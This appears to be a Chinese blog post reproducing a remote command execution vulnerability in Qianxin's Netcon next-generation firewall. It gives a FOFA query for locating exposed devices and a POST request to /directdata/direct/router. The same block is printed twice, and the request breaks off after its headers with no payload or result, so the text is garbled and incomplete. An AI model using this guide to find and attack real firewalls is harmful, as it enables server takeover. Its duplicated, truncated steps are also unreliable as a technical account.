admin管理员组

文章数量:1130349

文章目录

      • 漏洞描述
      • 漏洞影响
      • FOFA
      • 漏洞复现
        • 第一步 登录页面如下
        • 第二步 发送如下请求包
        • 第三步 再请求获取命令执行结果
      • 漏洞复现poc
      • 摘抄

漏洞描述

  • 奇安信 网康下一代防火墙存在远程命令执行,通过漏洞攻击者可以获取服务器权限

漏洞影响

  • 奇安信 网康下一代防火墙

FOFA

app="网康科技-下一代防火墙"

漏洞复现

第一步 登录页面如下

第二步 发送如下请求包
POST /directdata/direct/router HTTP/1.1
Host: ip
Sec-Ch-Ua: "Chromium";v="89", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

文章目录

      • 漏洞描述
      • 漏洞影响
      • FOFA
      • 漏洞复现
        • 第一步 登录页面如下
        • 第二步 发送如下请求包
        • 第三步 再请求获取命令执行结果
      • 漏洞复现poc
      • 摘抄

漏洞描述

  • 奇安信 网康下一代防火墙存在远程命令执行,通过漏洞攻击者可以获取服务器权限

漏洞影响

  • 奇安信 网康下一代防火墙

FOFA

app="网康科技-下一代防火墙"

漏洞复现

第一步 登录页面如下

第二步 发送如下请求包
POST /directdata/direct/router HTTP/1.1
Host: ip
Sec-Ch-Ua: "Chromium";v="89", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

本文标签: 防火墙漏洞网康下RCE